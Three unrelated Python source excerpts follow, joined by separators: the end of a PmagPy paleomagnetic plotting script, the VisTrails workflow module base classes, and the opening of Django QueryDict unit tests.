Drecs = pmag.get_dictitem(data, dec_key, '', 'F')
# get all inc measurements
Irecs = pmag.get_dictitem(data, inc_key, '', 'F')
for key in Mkeys:
Mrecs = pmag.get_dictitem(
data, key, '', 'F') # get intensity data
if len(Mrecs) > 0:
break
# potential for stepwise demag curves
if len(AFZrecs) > 0 or len(TZrecs) > 0 or len(MZrecs) > 0 and len(Drecs) > 0 and len(Irecs) > 0 and len(Mrecs) > 0:
#CMD = 'zeq_magic.py -f tmp_measurements.txt -fsp tmp_specimens.txt -fsa tmp_samples.txt -fsi tmp_sites.txt -sav -fmt ' + fmt + ' -crd ' + crd + " -new"
CMD = "ipmag.zeq_magic(crd={}, n_plots='all', contribution={}, image_records=True, fmt={})".format(crd, con, fmt)
print(CMD)
info_log(CMD, loc)
res, outfiles, zeq_images = ipmag.zeq_magic(crd=crd, n_plots='all',
contribution=con, image_records=True, fmt=fmt)
image_recs.extend(zeq_images)
# looking for thellier_magic possibilities
if len(pmag.get_dictitem(data, method_key, 'LP-PI-TRM', 'has')) > 0:
#CMD = 'thellier_magic.py -f tmp_measurements.txt -fsp tmp_specimens.txt -sav -fmt ' + fmt
CMD = "ipmag.thellier_magic(n_specs='all', fmt='{}', contribution={}, image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, thellier_images = ipmag.thellier_magic(n_specs='all', fmt=fmt, contribution=con, image_records=True)
image_recs.extend(thellier_images)
# looking for hysteresis possibilities
if len(pmag.get_dictitem(data, method_key, 'LP-HYS', 'has')) > 0: # find hyst experiments
# check for reqd columns
missing = check_for_reqd_cols(data, ['treat_temp'])
if missing:
error_log('LP-HYS method code present, but required column(s) [{}] missing'.format(", ".join(missing)), loc, "quick_hyst.py", con_id=con_id)
else:
#CMD = 'quick_hyst.py -f tmp_measurements.txt -sav -fmt ' + fmt
CMD = "ipmag.quick_hyst(fmt='{}', n_plots='all', contribution={}, image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, quick_hyst_recs = ipmag.quick_hyst(fmt=fmt, n_plots='all', contribution=con, image_records=True)
image_recs.extend(quick_hyst_recs)
# equal area plots of directional data
# at measurement level (by specimen)
if data:
missing = check_for_reqd_cols(data, ['dir_dec', 'dir_inc'])
if not missing:
#CMD = "eqarea_magic.py -f tmp_measurements.txt -obj spc -sav -no-tilt -fmt " + fmt
CMD = "ipmag.eqarea_magic(fmt=fmt, n_plots='all', ignore_tilt=True, plot_by='spc', contribution={}, source_table='measurements', image_records=True)".format(fmt, con)
print(CMD)
info_log(CMD, loc, "eqarea_magic.py")
res, outfiles, eqarea_spc_images = ipmag.eqarea_magic(fmt=fmt, n_plots='all',
ignore_tilt=True, plot_by="spc",
contribution=con,
source_table="measurements",
image_records=True)
image_recs.extend(eqarea_spc_images)
else:
if VERBOSE:
print('-I- No measurement data found')
# site data
if results_file in filelist and site_data:
print('-I- result file found', results_file)
data = site_data
file_type = 'sites'
print('-I- working on site directions')
print('number of datapoints: ', len(data), loc)
dec_key = 'dir_dec'
inc_key = 'dir_inc'
int_key = 'int_abs'
SiteDIs = pmag.get_dictitem(data, dec_key, "", 'F') # find decs
SiteDIs = pmag.get_dictitem(
SiteDIs, inc_key, "", 'F') # find decs and incs
dir_data_found = len(SiteDIs)
print('{} Dec/inc pairs found'.format(dir_data_found))
if SiteDIs:
# then convert tilt_corr_key to correct format
old_SiteDIs = SiteDIs
SiteDIs = []
for rec in old_SiteDIs:
if tilt_corr_key not in rec:
rec[tilt_corr_key] = "0"
# make sure tilt_corr_key is a correct format
try:
rec[tilt_corr_key] = str(int(float(rec[tilt_corr_key])))
except ValueError:
rec[tilt_corr_key] = "0"
SiteDIs.append(rec)
print('number of individual directions: ', len(SiteDIs))
# tilt corrected coordinates
SiteDIs_t = pmag.get_dictitem(SiteDIs, tilt_corr_key, '100',
'T', float_to_int=True)
print('number of tilt corrected directions: ', len(SiteDIs_t))
SiteDIs_g = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '0', 'T', float_to_int=True) # geographic coordinates
print('number of geographic directions: ', len(SiteDIs_g))
SiteDIs_s = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '-1', 'T', float_to_int=True) # sample coordinates
print('number of sample directions: ', len(SiteDIs_s))
SiteDIs_x = pmag.get_dictitem(
SiteDIs, tilt_corr_key, '', 'T') # no coordinates
print('number of no coordinates directions: ', len(SiteDIs_x))
if len(SiteDIs_t) > 0 or len(SiteDIs_g) > 0 or len(SiteDIs_s) > 0 or len(SiteDIs_x) > 0:
CRD = ""
if len(SiteDIs_t) > 0:
CRD = ' -crd t'
crd = "t"
elif len(SiteDIs_g) > 0:
CRD = ' -crd g'
crd = "g"
elif len(SiteDIs_s) > 0:
CRD = ' -crd s'
crd = "s"
#CMD = 'eqarea_magic.py -f tmp_sites.txt -fsp tmp_specimens.txt -fsa tmp_samples.txt -flo tmp_locations.txt -sav -fmt ' + fmt + CRD
CMD = "ipmag.eqarea_magic(crd={}, fmt={}, n_plots='all', contribution={}, source_table='sites')".format(fmt, crd, con)
print(CMD)
info_log(CMD, loc)
res, outfiles, eqarea_site_recs = ipmag.eqarea_magic(crd=crd, fmt=fmt, n_plots='all',
contribution=con, source_table="sites",
image_records=True)
image_recs.extend(eqarea_site_recs)
else:
if dir_data_found:
error_log('{} dec/inc pairs found, but no equal area plots were made'.format(dir_data_found), loc, "equarea_magic.py", con_id=con_id)
#
print('-I- working on VGP map')
VGPs = pmag.get_dictitem(
SiteDIs, 'vgp_lat', "", 'F') # are there any VGPs?
if len(VGPs) > 0: # YES!
#CMD = 'vgpmap_magic.py -f tmp_sites.txt -prj moll -res c -sym ro 5 -sav -fmt {}'.format(fmt)
CMD = "ipmag.vgpmap_magic(proj='moll', sym='ro', size=5, fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc, 'vgpmap_magic.py')
res, outfiles, vgpmap_recs = ipmag.vgpmap_magic(proj='moll', sym='ro', size=5,
fmt=fmt, contribution=con,
image_records=True)
image_recs.extend(vgpmap_recs)
else:
print('-I- No vgps found')
print('-I- Look for intensities')
# is there any intensity data?
if site_data:
if int_key in site_data[0].keys():
# old way, wasn't working right:
#CMD = 'magic_select.py -key ' + int_key + ' 0. has -F tmp1.txt -f tmp_sites.txt'
Selection = pmag.get_dictkey(site_data, int_key, dtype="f")
selection = [i * 1e6 for i in Selection if i != 0]
loc = loc.replace(" ", "_")
if loc == "./":
loc_name = ""
else:
loc_name = loc
histfile = 'LO:_' + loc_name + \
'_TY:_intensities_histogram:_.' + fmt
CMD = "histplot.py -twin -b 1 -xlab 'Intensity (uT)' -sav -f intensities.txt -F " + histfile
CMD = "ipmag.histplot(data=selection, outfile=histfile, xlab='Intensity (uT)', binsize=1, norm=-1, save_plots=True)".format(histfile)
info_log(CMD, loc)
print(CMD)
ipmag.histplot(data=selection, outfile=histfile, xlab="Intensity (uT)",
binsize=1, norm=-1, save_plots=True)
histplot_rec = {'file': histfile, 'type': 'Other', 'title': 'Intensity histogram',
'software_packages': version.version, 'keywords': "",
'timestamp': datetime.date.today().isoformat()}
image_recs.append(histplot_rec)
else:
print('-I- No intensities found')
else:
print('-I- No intensities found')
##
if hyst_file in filelist and spec_data:
print('working on hysteresis', hyst_file)
data = spec_data
file_type = 'specimens'
hdata = pmag.get_dictitem(data, hyst_bcr_key, '', 'F')
hdata = pmag.get_dictitem(hdata, hyst_mr_key, '', 'F')
hdata = pmag.get_dictitem(hdata, hyst_ms_key, '', 'F')
# there are data for a dayplot
hdata = pmag.get_dictitem(hdata, hyst_bc_key, '', 'F')
if len(hdata) > 0:
CMD = "ipmag.dayplot_magic(save=True, fmt={}, contribution={}, image_records=True)".format(fmt, con)
info_log(CMD, loc)
print(CMD)
res, outfiles, dayplot_recs = ipmag.dayplot_magic(save=True, fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(dayplot_recs)
else:
print('no hysteresis data found')
if aniso_file in filelist and spec_data: # do anisotropy plots if possible
print('working on anisotropy', aniso_file)
data = spec_data
file_type = 'specimens'
# make sure there is some anisotropy data
if not data:
print('No anisotropy data found')
elif 'aniso_s' not in data[0]:
print('No anisotropy data found')
else:
# get specimen coordinates
if aniso_tilt_corr_key not in data[0]:
sdata = data
else:
sdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '-1', 'T', float_to_int=True)
# get specimen coordinates
gdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '0', 'T', float_to_int=True)
# get specimen coordinates
tdata = pmag.get_dictitem(
data, aniso_tilt_corr_key, '100', 'T', float_to_int=True)
if len(sdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='s', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="s", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
if len(gdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='g', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="g", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
if len(tdata) > 3:
CMD = "ipmag.aniso_magic(iboot=0, ihext=1, crd='g', fmt={}, contribution={})".format(fmt, con)
print(CMD)
info_log(CMD, loc)
res, files, aniso_recs = ipmag.aniso_magic(iboot=0, ihext=1, crd="t", fmt=fmt,
contribution=con, image_records=True)
image_recs.extend(aniso_recs)
# remove temporary files
for fname in glob.glob('tmp*.txt'):
os.remove(fname)
# now we need full contribution data
if loc_file in filelist and loc_data:
#data, file_type = pmag.magic_read(loc_file) # read in location data
data = loc_data
print('-I- working on pole map')
poles = pmag.get_dictitem(
data, 'pole_lat', "", 'F') # are there any poles?
poles = pmag.get_dictitem(
poles, 'pole_lon', "", 'F') # are there any poles?
if len(poles) > 0: # YES!
CMD = 'polemap_magic.py -sav -fmt {} -rev gv 40'.format(fmt)
CMD = 'ipmag.polemap_magic(flip=True, rsym="gv", rsymsize=40, fmt="{}", contribution={})'.format(fmt, full_con)
print(CMD)
info_log(CMD, "all locations", "polemap_magic.py")
res, outfiles, polemap_recs = ipmag.polemap_magic(flip=True, rsym="gv", rsymsize=40,
fmt=fmt, contribution=full_con,
image_records=True)
image_recs.extend(polemap_recs)
else:
print('-I- No poles found')
if image_recs:
new_image_file = os.path.join(dir_path, 'new_images.txt')
old_image_file = os.path.join(dir_path, 'images.txt')
pmag.magic_write(new_image_file, image_recs, 'images')
if os.path.exists(old_image_file):
ipmag.combine_magic([old_image_file, new_image_file], outfile=old_image_file,
magic_table="images", dir_path=dir_path)
else:
os.rename(new_image_file, old_image_file)
if do_thumbnails:
thumbnails.make_thumbnails(dir_path)
if __name__ == "__main__":
main()
| |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import copy
from core.data_structures.bijectivedict import Bidict
from core.utils import VistrailsInternalError
class NeedsInputPort(Exception):
    """Raised when a module cannot proceed because an input port has no value."""
    def __init__(self, obj, port):
        self.obj = obj
        self.port = port
    def __str__(self):
        template = "Module %s needs port %s"
        return template % (self.obj, self.port)
class IncompleteImplementation(Exception):
    """Raised when a module subclass does not implement required behavior."""
    def __str__(self):
        return "Module has incomplete implementation"
class MissingModule(Exception):
    """Raised when a referenced module cannot be found."""
class ModuleBreakpoint(Exception):
    """Raised when execution reaches a module flagged as a breakpoint.

    Carries the offending module so the caller (interpreter/UI) can
    display the module's attributes and its current input values.
    """
    def __init__(self, module):
        self.module = module
        self.msg = "Hit breakpoint"
        self.errorTrace = ''
    def __str__(self):
        # Dump the module's attributes followed by its current inputs so
        # the user can inspect the paused state.
        # Fix: message previously read "Encoutered" (typo).
        retstr = "Encountered breakpoint at Module %s:\n" % (self.module)
        for k in self.module.__dict__.keys():
            retstr += "\t%s = %s\n" % (k, self.module.__dict__[k])
        inputs = self.examine_inputs()
        retstr += "\nModule has inputs:\n"
        for i in inputs.keys():
            retstr += "\t%s = %s\n" % (i, inputs[i])
        return retstr
    def examine_inputs(self):
        """Return a dict mapping each input port name to its list of values."""
        in_ports = self.module.__dict__["inputPorts"]
        inputs = {}
        for p in in_ports:
            inputs[p] = self.module.getInputListFromPort(p)
        return inputs
class ModuleError(Exception):
    """Runtime error signalled by a VisTrails module.

    The interpreter recognizes this exception and uses it for meaningful
    error reporting to the user and to the logging mechanism.
    """
    def __init__(self, module, errormsg):
        """Store the module that signalled the error and the message string.

        Also captures the current traceback (if any) in errorTrace.
        """
        import traceback
        Exception.__init__(self, errormsg)
        self.module = module
        self.msg = errormsg
        self.errorTrace = traceback.format_exc()
class ModuleSuspended(ModuleError):
    """Raised by a module that is not yet able to finish.

    Suspension flags that the workflow should be resumed later: modules
    upstream of the suspended one still execute, but downstream modules
    are skipped.  Typical use is polling an external job without
    blocking VisTrails while waiting for it to complete.
    """
    def __init__(self, module, errormsg):
        ModuleError.__init__(self, module, errormsg)
class ModuleErrors(Exception):
    """Aggregates several VisTrails module runtime errors.

    Recognized by the interpreter for meaningful error reporting, like
    ModuleError, but for a batch of failures.
    """
    def __init__(self, module_errors):
        """Take a list of ModuleError objects and join their messages."""
        messages = tuple(me.msg for me in module_errors)
        Exception.__init__(self, str(messages))
        self.module_errors = module_errors
class _InvalidOutput(object):
""" Specify an invalid result
"""
pass
InvalidOutput = _InvalidOutput
################################################################################
# DummyModuleLogging
class DummyModuleLogging(object):
def end_update(*args, **kwargs): pass
def begin_update(*args, **kwargs): pass
def begin_compute(*args, **kwargs): pass
def update_cached(*args, **kwargs): pass
def signalSuccess(*args, **kwargs): pass
def annotate(*args, **kwargs): pass
_dummy_logging = DummyModuleLogging()
################################################################################
# Module
class Module(object):
    """Module is the base module from which all module functionality
    is derived from in VisTrails. It defines a set of basic interfaces to
    deal with data input/output (through ports, as will be explained
    later), as well as a basic mechanism for dataflow based updates.
    Execution Model
    VisTrails assumes fundamentally that a pipeline is a dataflow. This
    means that pipeline cycles are disallowed, and that modules are
    supposed to be free of side-effects. This is obviously not possible
    in general, particularly for modules whose sole purpose is to
    interact with operating system resources. In these cases, designing
    a module is harder -- the side effects should ideally not be exposed
    to the module interface. VisTrails provides some support for making
    this easier, as will be discussed later.
    VisTrails caches intermediate results to increase efficiency in
    exploration. It does so by reusing pieces of pipelines in later
    executions.
    Terminology
    Module Interface: The module interface is the set of input and
    output ports a module exposes.
    Designing New Modules
    Designing new modules is essentially a matter of subclassing this
    module class and overriding the compute() method. There is a
    fully-documented example of this on the default package
    'pythonCalc', available on the 'packages/pythonCalc' directory.
    Caching
    Caching affects the design of a new module. Most importantly,
    users have to account for compute() being called more than
    once. Even though compute() is only called once per individual
    execution, new connections might mean that previously uncomputed
    output must be made available.
    Also, operating system side-effects must be carefully accounted
    for. Some operations are fundamentally side-effectful (creating OS
    output like uploading a file on the WWW or writing a file to a
    local hard drive). These modules should probably not be cached at
    all. VisTrails provides an easy way for modules to report that
    they should not be cached: simply subclass from the NotCacheable
    mixin provided in this python module. (NB: In order for the mixin
    to work appropriately, NotCacheable must appear *BEFORE* any other
    subclass in the class hierarchy declarations). These modules (and
    anything that depends on their results) will then never be reused.
    Intermediate Files
    Many modules communicate through intermediate files. VisTrails
    provides automatic filename and handle management to alleviate the
    burden of determining tricky things (e.g. longevity) of these
    files. Modules can request temporary file names through the file pool,
    currently accessible through
    self.interpreter.filePool
    The FilePool class is available in core/modules/module_utils.py -
    consult its documentation for usage. Notably, using the file pool
    will make temporary files work correctly with caching, and will
    make sure the temporaries are correctly removed.
    """
    def __init__(self):
        self.inputPorts = {}
        self.outputPorts = {}
        self.upToDate = False
        self.setResult("self", self) # every object can return itself
        self.logging = _dummy_logging
        # isMethod stores whether a certain input port is a method.
        # If so, isMethod maps the port to the order in which it is
        # stored. This is so that modules that need to know about the
        # method order can work correctly
        self.is_method = Bidict()
        self._latest_method_order = 0
        # Pipeline info that a module should know about. This is useful
        # for a spreadsheet cell to know where it is from. It will be
        # also used for talking back and forth between the spreadsheet
        # and the builder besides Parameter Exploration.
        self.moduleInfo = {
            'locator': None,
            'vistrailName': 'Unknown',
            'version': -1,
            'pipeline': None,
            'moduleId': -1,
            'reason': 'Pipeline Execution',
            'actions': []
        }
        self.is_breakpoint = False
        # is_fold_operator stores whether the module is a part of a fold
        self.is_fold_operator = False
        # is_fold_module stores whether the module is a fold module
        self.is_fold_module = False
        # computed stores whether the module was computed;
        # used for the logging stuff
        self.computed = False
        self.suspended = False
        self.signature = None
    def clear(self):
        """clear(self) -> None. Removes all references, prepares for
        deletion."""
        for connector_list in self.inputPorts.itervalues():
            for connector in connector_list:
                connector.clear()
        self.inputPorts = {}
        self.outputPorts = {}
        self.logging = _dummy_logging
        self.is_method = Bidict()
        self._latest_method_order = 0
    def is_cacheable(self):
        """is_cacheable() -> bool. A Module should return whether it
        can be reused across executions. It is safe for a Module to return
        different values in different occasions. In other words, it is
        possible for modules to be cacheable depending on their execution
        context."""
        return True
    def updateUpstreamPort(self, port):
        """Update only the modules feeding the given input port, then drop
        any connector on that port whose output is the InvalidOutput
        sentinel.  Propagates a suspension flag from upstream modules."""
        # update single port
        if port in self.inputPorts:
            for connector in self.inputPorts[port]:
                connector.obj.update()
                if hasattr(connector.obj, 'suspended') and \
                        connector.obj.suspended:
                    self.suspended = connector.obj.suspended
            for connector in copy.copy(self.inputPorts[port]):
                if connector.obj.get_output(connector.port) is InvalidOutput:
                    self.removeInputConnector(port, connector)
    def updateUpstream(self):
        """ updateUpstream() -> None
        Go upstream from the current module, then update its upstream
        modules and check input connection based on upstream modules
        results
        """
        for connectorList in self.inputPorts.itervalues():
            for connector in connectorList:
                connector.obj.update()
                if hasattr(connector.obj, 'suspended') and \
                        connector.obj.suspended:
                    self.suspended = connector.obj.suspended
        # Iterate over a copy because removeInputConnector mutates
        # self.inputPorts while we scan it.
        for iport, connectorList in copy.copy(self.inputPorts.items()):
            for connector in connectorList:
                if connector.obj.get_output(connector.port) is InvalidOutput:
                    self.removeInputConnector(iport, connector)
    def update(self):
        """ update() -> None
        Check if the module is up-to-date then update the
        modules. Report to the logger if available
        """
        self.logging.begin_update(self)
        self.updateUpstream()
        if self.suspended:
            return
        if self.upToDate:
            # Cached result: only notify the logger the first time.
            if not self.computed:
                self.logging.update_cached(self)
                self.computed = True
            return
        self.logging.begin_compute(self)
        try:
            if self.is_breakpoint:
                raise ModuleBreakpoint(self)
            self.compute()
            self.computed = True
        except ModuleSuspended, e:
            # Suspension is not an error: record it and bail out quietly.
            self.suspended = e.msg
            self.logging.end_update(self, e.msg, was_suspended=True)
            self.logging.signalSuspended(self)
            return
        except ModuleError, me:
            if hasattr(me.module, 'interpreter'):
                raise
            else:
                # Re-attribute errors from dynamically created modules
                # (which have no interpreter) to this module.
                msg = "A dynamic module raised an exception: '%s'"
                msg %= str(me)
                raise ModuleError(self, msg)
        except ModuleErrors:
            raise
        except KeyboardInterrupt, e:
            raise ModuleError(self, 'Interrupted by user')
        except ModuleBreakpoint:
            raise
        except Exception, e:
            # Wrap any other exception so the interpreter can report it.
            import traceback
            traceback.print_exc()
            raise ModuleError(self, 'Uncaught exception: "%s"' % str(e))
        self.upToDate = True
        self.logging.end_update(self)
        self.logging.signalSuccess(self)
    def checkInputPort(self, name):
        """checkInputPort(name) -> None.
        Makes sure input port 'name' is filled."""
        if not self.hasInputFromPort(name):
            raise ModuleError(self, "'%s' is a mandatory port" % name)
    def compute(self):
        """Entry point for subclasses: perform this module's work.
        The base implementation does nothing."""
        pass
    def setResult(self, port, value):
        """Store value on the named output port."""
        self.outputPorts[port] = value
    def get_output(self, port):
        """Return the value stored on an output port; raise ModuleError
        if the port was never set."""
        # if self.outputPorts.has_key(port) or not self.outputPorts[port]:
        if port not in self.outputPorts:
            raise ModuleError(self, "output port '%s' not found" % port)
        return self.outputPorts[port]
    def getInputConnector(self, inputPort):
        """Return the first connector attached to an input port; raise
        ModuleError if the port has no connections."""
        if not self.inputPorts.has_key(inputPort):
            raise ModuleError(self, "Missing value from port %s" % inputPort)
        return self.inputPorts[inputPort][0]
    def getInputFromPort(self, inputPort):
        """Return a single value from an input port, preferring
        connections that come from an InputPort sub-module."""
        if not self.inputPorts.has_key(inputPort):
            raise ModuleError(self, "Missing value from port %s" % inputPort)
        # Cannot resolve circular reference here, need to be fixed later
        from core.modules.sub_module import InputPort
        for conn in self.inputPorts[inputPort]:
            if type(conn.obj)==InputPort:
                return conn()
        return self.inputPorts[inputPort][0]()
    def hasInputFromPort(self, inputPort):
        """Return True when the named input port has at least one connection."""
        return self.inputPorts.has_key(inputPort)
    def __str__(self):
        return "<<%s>>" % str(self.__class__)
    def annotate(self, d):
        """Forward an annotation dict to the logger."""
        self.logging.annotate(self, d)
    def forceGetInputFromPort(self, inputPort, defaultValue=None):
        """Like getInputFromPort, but return defaultValue instead of
        raising when the port is unconnected."""
        if self.hasInputFromPort(inputPort):
            return self.getInputFromPort(inputPort)
        else:
            return defaultValue
    def set_input_port(self, inputPort, conn, is_method=False):
        """Attach a connector to an input port; when is_method is True,
        also record the order in which method ports were set."""
        if self.inputPorts.has_key(inputPort):
            self.inputPorts[inputPort].append(conn)
        else:
            self.inputPorts[inputPort] = [conn]
        if is_method:
            self.is_method[conn] = (self._latest_method_order, inputPort)
            self._latest_method_order += 1
    def getInputListFromPort(self, inputPort):
        """Return the list of all values on an input port.  Values coming
        from InputPort sub-modules take precedence when present."""
        if not self.inputPorts.has_key(inputPort):
            raise ModuleError(self, "Missing value from port %s" % inputPort)
        # Cannot resolve circular reference here, need to be fixed later
        from core.modules.sub_module import InputPort
        fromInputPortModule = [connector()
                               for connector in self.inputPorts[inputPort]
                               if type(connector.obj)==InputPort]
        if len(fromInputPortModule)>0:
            return fromInputPortModule
        return [connector() for connector in self.inputPorts[inputPort]]
    def forceGetInputListFromPort(self, inputPort):
        """Like getInputListFromPort, but return [] instead of raising
        when the port is unconnected."""
        if not self.inputPorts.has_key(inputPort):
            return []
        return self.getInputListFromPort(inputPort)
    def enableOutputPort(self, outputPort):
        """ enableOutputPort(outputPort: str) -> None
        Set an output port to be active to store result of computation
        """
        # Don't reset existing values, it screws up the caching.
        if not self.outputPorts.has_key(outputPort):
            self.setResult(outputPort, None)
    def removeInputConnector(self, inputPort, connector):
        """ removeInputConnector(inputPort: str,
                                 connector: ModuleConnector) -> None
        Remove a connector from the connection list of an input port
        """
        if self.inputPorts.has_key(inputPort):
            conList = self.inputPorts[inputPort]
            if connector in conList:
                conList.remove(connector)
            if conList==[]:
                # Drop the port entry entirely once its last connector goes.
                del self.inputPorts[inputPort]
    def create_instance_of_type(self, ident, name, ns=''):
        """ Create a vistrails module from the module registry. This creates an instance of the module
        for use in creating the object output by a Module.
        """
        # FIXME (DAK): I don't get this, shouldn't we import module_registry?
        import core.modules.vistrails_module
        try:
            reg = core.modules.module_registry.get_module_registry()
            m = reg.get_module_by_name(ident, name, ns)
            return m()
        except:
            msg = "Cannot get module named " + str(name) + " with identifier " + str(ident) + " and namespace " + ns
            raise ModuleError(self, msg)
    @classmethod
    def provide_input_port_documentation(cls, port_name):
        """Hook for subclasses: return docs for an input port (None here)."""
        return None
    @classmethod
    def provide_output_port_documentation(cls, port_name):
        """Hook for subclasses: return docs for an output port (None here)."""
        return None
################################################################################
class NotCacheable(object):
    """Mixin that opts a module out of result caching.

    Must appear before other bases in the class declaration so that this
    is_cacheable wins in the MRO.
    """
    def is_cacheable(self):
        # Never reuse this module's results across executions.
        return False
################################################################################
class ModuleConnector(object):
    """Binds a downstream input to an upstream module's output port.

    Calling the connector fetches the current value of that output port.
    """
    def __init__(self, obj, port, spec=None):
        self.obj = obj
        self.port = port
        # Bug fix: 'spec' was accepted but silently discarded; keep it so
        # callers that pass a port spec can retrieve it later.
        self.spec = spec
    def clear(self):
        """clear() -> None. Removes references, prepares for deletion."""
        self.obj = None
        self.port = None
        self.spec = None
    def __call__(self):
        # Pull the value currently stored on the upstream output port.
        return self.obj.get_output(self.port)
def new_module(baseModule, name, dict={}, docstring=None):
    """new_module(baseModule or [baseModule list],
                  name,
                  dict={},
                  docstring=None)

    Creates a new VisTrails module dynamically. Exactly one of the
    elements of the baseModule list (or baseModule itself, in the case
    it's a single class) should be a subclass of Module.

    The 'dict' argument supplies the new class's namespace; it is copied
    before use, so the shared mutable default is safe.

    Raises TypeError when baseModule is neither a class nor a list
    (previously this fell through to an UnboundLocalError on
    'superclasses').
    """
    if type(baseModule) == type:
        assert issubclass(baseModule, Module)
        superclasses = (baseModule, )
    elif type(baseModule) == list:
        assert len([x for x in baseModule
                    if issubclass(x, Module)]) == 1
        superclasses = tuple(baseModule)
    else:
        raise TypeError("new_module expects a class or a list of classes, "
                        "got %r" % (baseModule,))
    d = copy.copy(dict)
    if docstring:
        d['__doc__'] = docstring
    return type(name, superclasses, d)
# This is the gist of how type() works. The example is run from a python
# toplevel
# >>> class X(object):
# ... def f(self): return 3
# ...
# >>> a = X()
# >>> a.f()
# 3
# >>> Y = type('Y', (X, ), {'g': lambda x : 4})
# >>> b = Y()
# >>> b.f()
# 3
# >>> b.g()
# 4
# >>> Z = type('Z', (X, ), {'f': lambda x : 4} )
# >>> c = Z()
# >>> c.f()
# 4
| |
import copy
import pickle
from django.http import (QueryDict, HttpResponse, SimpleCookie, BadHeaderError,
parse_cookie)
from django.utils import unittest
class QueryDictTests(unittest.TestCase):
    def test_missing_key(self):
        """Subscripting an absent key raises KeyError, like a plain dict."""
        q = QueryDict('')
        self.assertRaises(KeyError, q.__getitem__, 'foo')
    def test_immutability(self):
        """A default (immutable) QueryDict rejects every mutating operation."""
        q = QueryDict('')
        self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
        self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
        self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
        self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
        self.assertRaises(AttributeError, q.pop, 'foo')
        self.assertRaises(AttributeError, q.popitem)
        self.assertRaises(AttributeError, q.clear)
    def test_immutable_get_with_default(self):
        """get() with a default works on an immutable QueryDict."""
        q = QueryDict('')
        self.assertEqual(q.get('foo', 'default'), 'default')
    def test_immutable_basic_operations(self):
        """Read-only accessors all behave sanely on an empty QueryDict."""
        q = QueryDict('')
        self.assertEqual(q.getlist('foo'), [])
        self.assertEqual(q.has_key('foo'), False)
        self.assertEqual('foo' in q, False)
        self.assertEqual(q.items(), [])
        self.assertEqual(q.lists(), [])
        self.assertEqual(q.items(), [])
        self.assertEqual(q.keys(), [])
        self.assertEqual(q.values(), [])
        self.assertEqual(len(q), 0)
        self.assertEqual(q.urlencode(), '')
    def test_single_key_value(self):
        """Test QueryDict with one key/value pair: reads succeed, writes raise."""
        q = QueryDict('foo=bar')
        self.assertEqual(q['foo'], 'bar')
        self.assertRaises(KeyError, q.__getitem__, 'bar')
        self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
        self.assertEqual(q.get('foo', 'default'), 'bar')
        self.assertEqual(q.get('bar', 'default'), 'default')
        self.assertEqual(q.getlist('foo'), ['bar'])
        self.assertEqual(q.getlist('bar'), [])
        self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
        self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
        self.assertTrue(q.has_key('foo'))
        self.assertTrue('foo' in q)
        self.assertFalse(q.has_key('bar'))
        self.assertFalse('bar' in q)
        self.assertEqual(q.items(), [(u'foo', u'bar')])
        self.assertEqual(q.lists(), [(u'foo', [u'bar'])])
        self.assertEqual(q.keys(), ['foo'])
        self.assertEqual(q.values(), ['bar'])
        self.assertEqual(len(q), 1)
        self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
        self.assertRaises(AttributeError, q.pop, 'foo')
        self.assertRaises(AttributeError, q.popitem)
        self.assertRaises(AttributeError, q.clear)
        self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
        self.assertEqual(q.urlencode(), 'foo=bar')
    def test_urlencode(self):
        """urlencode() percent-escapes values; 'safe' exempts given chars."""
        q = QueryDict('', mutable=True)
